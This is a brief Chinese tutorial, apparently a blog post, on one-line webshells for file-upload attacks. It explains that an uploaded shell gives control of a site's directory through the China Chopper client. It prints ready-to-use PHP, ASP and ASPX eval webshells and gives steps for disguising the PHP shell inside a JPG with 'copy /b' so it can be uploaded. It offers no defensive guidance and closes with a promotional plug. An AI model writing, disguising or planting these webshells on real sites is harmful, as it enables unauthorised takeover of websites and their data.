文件上传之一句话木马原理及制作

一句话木马概念

【基本原理】利用文件上传漏洞，往目标网站中上传一句话木马，然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误，也不报错。eval（）函数表示括号内的语句字符串什么的全都当做代码执行。$_POST['attack']表示从页面中获得attack这个参数值。

常见的一句话木马：

php的一句话木马： <?php @eval($_POST['pass']);?> 或 <?php @eval($_POST['cmd']);?> 或 <?php @eval($_POST['attack']) ;?>

asp的一句话是： <%eval request ("pass")%>

aspx的一句话是： <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

 

 

一句话木马制作方式

1.桌面新建一个文件夹

 

 

2.在新建的文件夹中放入三个文件，分别为图片文件tp.jpg，和yjh.php一句话木马和一个写入cmd的bat文件

tp.jpg可用任意图片

yjh.php文件用notepad++可以创建，保存时文件名后缀改为.php即可，文件中的内容为<?php @eval($_POST['cmd']);?>

.bat文件可用笔记本创建，保存时文件名后缀改为.bat即可，文件中的内容为cmd

 

4.双击.bat文件进入DOS命令，写入"copy  tp.jpg/b+yjh.php  tpyjh.jpg" 回车

 

5.文件夹中自动生成一个叫tpyjh.jpg的图片文件，这个文件中就包含一句话木马，可以拿去上传了, 更多网络安全测试技术，请关注公众号“测试运维”，关注测试技术发展；